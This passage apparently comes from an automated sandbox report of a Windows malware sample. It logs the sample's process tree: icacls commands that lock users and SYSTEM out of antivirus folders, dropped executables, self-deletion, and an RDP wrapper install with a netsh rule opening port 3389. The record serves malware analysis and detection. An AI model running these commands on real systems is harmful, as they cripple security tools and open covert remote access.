                                                                                                                                                                PID:4980
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4776
                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                  icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                  PID:4968
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4864
                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:5076
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4876
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                      PID:5060
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4996
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:4148
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5088
                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                          icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                          PID:4240
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4192
                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                            PID:4280
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4176
                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                              icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                              PID:4288
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4328
                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                PID:4432
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4324
                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                  icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:4516
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4492
                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:4576
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4632
                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                      PID:2212
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4596
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:4608
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1604
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:860
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1732
                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                            icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                            PID:4604
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4104
                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                              PID:2052
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4436
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                PID:4484
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4448
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:4476
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4352
                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:4568
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4472
                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:2492
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:196
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:5028
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4460
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                          PID:4620
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5092
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:4320
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4984
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:4852
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2240
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:4700
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4640
                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                  icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:2324
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4400
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:804
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:4504
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:4588
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4916
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                        PID:4556
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4380
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                          icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          PID:4524
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2292
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                            icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                            PID:2168
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4616
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                              icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              PID:4704
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4816
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:4748
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:4900
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                  PID:4856
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4796
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:5100
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:4252
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                      PID:5072
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:4156
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                        PID:4896
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:4316
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                          icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                          PID:4672
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4308
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                            icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:2288
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4480
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                              PID:1564
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:4108
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                PID:1632
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:2132
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  PID:500
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:4888
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                    PID:4804
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:4760
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                      PID:5096
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:5052
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:4128
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5080
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:4624
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:1972
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                            PID:4580
                                                                                                                                                                                                                                                        • C:\Programdata\Install\utorrent.exe
                                                                                                                                                                                                                                                          C:\Programdata\Install\utorrent.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                          • NTFS ADS
                                                                                                                                                                                                                                                          PID:4296
                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\azur.exe
                                                                                                                                                                                                                                                            C:\ProgramData\WindowsTask\azur.exe
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                            PID:4736
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:4740
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\timeout.exe 3
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                  PID:4732
                                                                                                                                                                                                                                                            • C:\ProgramData\WindowsTask\system.exe
                                                                                                                                                                                                                                                              C:\ProgramData\WindowsTask\system.exe
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              PID:4180
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\selfDel.bat" "
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:5704
                                                                                                                                                                                                                                                              • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                                C:\ProgramData\RDPWinst.exe -u
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                PID:4300
                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                                                                                                                  netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:5476
                                                                                                                                                                                                                                                                • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                                  C:\ProgramData\RDPWinst.exe -i
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Modifies WinLogon
                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:5520
                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                                                                                                                    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:5636
                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhost.exe
